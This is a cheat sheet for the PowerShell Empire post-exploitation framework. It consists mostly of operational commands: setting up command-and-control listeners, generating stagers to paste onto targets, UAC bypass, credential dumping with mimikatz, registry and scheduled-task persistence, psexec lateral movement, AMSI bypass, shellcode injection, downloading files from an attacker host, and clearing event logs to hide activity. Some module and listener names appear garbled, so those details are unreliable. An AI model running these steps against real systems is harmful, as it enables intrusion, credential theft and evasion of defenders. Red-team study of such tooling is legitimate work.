PowerShell Empire

PowerShell Empire is a pure PowerShell post-exploitation framework. Deploy agents, execute commands, escalate privileges, and extract data from Windows targets without dropping binaries.

Installation

Linux

# Clone repository
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire

# Install dependencies
python3 -m pip install -r requirements/base.txt

# Run setup
python3 empire

# Or use Docker
docker run -it bc-security/empire:latest

MacOS

# Homebrew
brew install empire

# Or from source
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
python3 setup.py install

Windows

# PowerShell (not Powershell 7)
# Download from GitHub
# https://github.com/BC-SECURITY/Empire

# Run server
python empire

Basic Operations

Start Empire Server

# Start server
python3 empire

# On port 5000 (default)
# Open browser to localhost:5000

REST API (Alternative)

# Use REST API instead of web UI
curl -X GET http://localhost:1337/api/version

# Generate listener
curl -X POST http://localhost:1337/api/listeners \
  -H "Authorization: Bearer token" \
  -d '{...listener config...}'

Listeners & Stagers

Create HTTP Listener

# In Empire CLI:
listeners
uselistener http
set Port 8080
set Host http://192.168.1.10:8080
execute

# View listeners
listeners

Create HTTPS Listener

# For encrypted C2
listeners
uselistener http
set Host https://192.168.1.10:443
set Port 443
set CertPath /path/to/cert.pem
set KeyPath /path/to/key.pem
execute

Other Listener Types

# Available listeners
listeners

# Common listeners:
# - http: HTTP listener
# - https: HTTPS listener
# - meterpreter: Meterpreter listener
# - redirector: HTTP redirector
# - dohlhttpproxy: Dohlhttpproxy

Generate Stagers

# Generate PowerShell stager
usestager windows/launcher_bat
set Listener http
execute

# Generate other stagers:
usestager windows/launcher_hta
usestager windows/launcher_vbs
usestager windows/launcher_dll
usestager windows/launcher_ps

# Get stager code to copy/paste

Agent Management

Interact with Agents

# List agents
agents

# Interact with agent
interact agent_name

# Execute command
shell whoami
shell ipconfig /all
shell tasklist

# Get system info
shell systeminfo

# Network commands
shell netstat -an
shell arp -a
shell nslookup example.com

Agent Commands

# Within agent session
whoami
pwd
cd c:\Windows
ls
cat filename.txt

# Process management
get-process
Stop-Process -Id 1234
Start-Process -FilePath notepad.exe

# Registry operations
Get-Item HKLM:\Software\...
Set-ItemProperty ...

# Network commands
Test-Connection 192.168.1.1
Get-NetIPConfiguration

Modules

Common Modules

# List modules
usemodule

# Privilege Escalation
usemodule privesc/bypassuac
usemodule privesc/bypassuac_eventvwr
usemodule privesc/bypassuac_fodhelper
usemodule privesc/getsystem

# Credential Harvesting
usemodule collection/get_browser_data
usemodule collection/get_clipboard
usemodule collection/mimikatz
usemodule collection/session_gister

# Persistence
usemodule persistence/registry_add
usemodule persistence/elevated_registry_add
usemodule persistence/scheduled_task
usemodule persistence/userland_registry

# Lateral Movement
usemodule lateral_movement/invoke_psexec
usemodule lateral_movement/invoke_wmi
usemodule lateral_movement/invoke_ssh

# Recon
usemodule situational_awareness/network/powerview
usemodule situational_awareness/host/get_os_version
usemodule situational_awareness/host/anti_virus_product
usemodule situational_awareness/host/firewall_rules

Execute Module

# Select module
usemodule collection/mimikatz

# Set options
set Agent agent_name
set Listener http

# Execute
execute

# View output
agents
interact agent_name
# Output shown here

Common Workflows

Initial Exploitation

# 1. Create listener
listeners
uselistener http
execute

# 2. Generate stager
usestager windows/launcher_bat
set Listener http
execute

# 3. Get PowerShell code from stager
# Copy and paste onto target

# 4. Monitor for agent callback
agents

# 5. Interact with agent
interact agent_name

Post-Exploitation

# 1. Privilege Escalation
usemodule privesc/bypassuac
set Agent agent_name
execute

# 2. Credential Dumping
usemodule collection/mimikatz
set Agent agent_name
execute

# 3. Establish Persistence
usemodule persistence/registry_add
set Agent agent_name
execute

# 4. Lateral Movement
usemodule lateral_movement/invoke_psexec
set Agent agent_name
set Target 192.168.1.101
set Username admin
set Password password
execute

Advanced Techniques

Obfuscation

# Use coded launcher
# Empire generates obfuscated PowerShell

# In agent:
shell Invoke-Obfuscation
shell Get-Content shell.ps1 | Invoke-Obfuscation

Custom Modules

# Create custom module
# Place in: /path/to/empire/lib/modules/

# Example structure:
class Module:
    options = {
        'Agent': {'Required': True, ...},
        'Option1': {'Required': False, ...}
    }

    def execute(self):
        # Execute code
        pass

File Transfer

# Upload file
shell Invoke-WebRequest -Uri http://192.168.1.10/file.exe -OutFile C:\file.exe

# Download file
shell (New-Object Net.WebClient).DownloadFile('http://192.168.1.10/file.exe', 'C:\file.exe')

# Base64 encode for transfer
shell [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\file.exe'))

Reverse Engineering

# Retrieve agent config
cat /path/to/agent/config

# Modify stager options
# Edit listener IP, port, URI

# Generate backdoor stager
# usestager windows/launcher_ps
# Modify to run on startup

Defense Evasion

Anti-Virus Evasion

# Test AMSI bypass
Set-Content -Path test.ps1 -Value 'write-host test'
Get-Content test.ps1 | powershell.exe -nop

# Use constrained language mode bypass
$ExecutionContext.SessionState.LanguageMode = 'FullLanguage'

Process Injection

# Use process injection module
usemodule payload/inject_shellcode
set Agent agent_name
set Shellcode raw_shellcode
set ProcessID 1234
execute

Living Off The Land

# Use legitimate Windows tools
# Empire leverages:
# - certutil
# - bitsadmin
# - mshta
# - cscript/wscript
# - regsvcs
# - regasm

Troubleshooting

Agent Connection Issues

# Check listener status
listeners

# Verify listener port is accessible
netstat -an | grep 8080

# Check firewall rules
Get-NetFirewallRule -DisplayName "Allow HTTP"

# Test connectivity
Test-NetConnection -ComputerName 192.168.1.10 -Port 8080

Module Failures

# Check module syntax
usemodule module_name
options

# Verify agent has permissions
shell whoami
shell [Security.Principal.WindowsIdentity]::GetCurrent()

# Test in isolated environment first

Stager Issues

# Verify stager output
usestager windows/launcher_ps
# Copy generated code
# Test in PowerShell
# Verify execution context (user, admin)

Security Considerations

Only use on authorized targets
Remove all agents and persistence post-engagement
Use encrypted listeners (HTTPS)
Document all activities
Clean logs: Get-EventLog -List | Clear-EventLog
Secure C2 infrastructure
Use aliases and OPSEC

Useful PowerShell Commands

# System enumeration
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_OperatingSystem
Get-Process
Get-Service

# Network enumeration
Get-NetIPAddress
Get-NetIPConfiguration
Get-DnsClientCache
Get-NetTCPConnection

# User enumeration
Get-LocalUser
Get-LocalGroup
net user
net localgroup

# Firewall enumeration
Get-NetFirewallProfile
Get-NetFirewallRule

# Scheduled tasks
Get-ScheduledTask
Get-ScheduledTaskInfo

Resources

Official Repository: https://github.com/BC-SECURITY/Empire
Documentation: https://bc-security.gitbook.io/empire/
Community Modules: https://github.com/BC-SECURITY/Empire/tree/master/lib/modules
PowerShell Docs: https://docs.microsoft.com/powershell

Last updated: 2025-03-30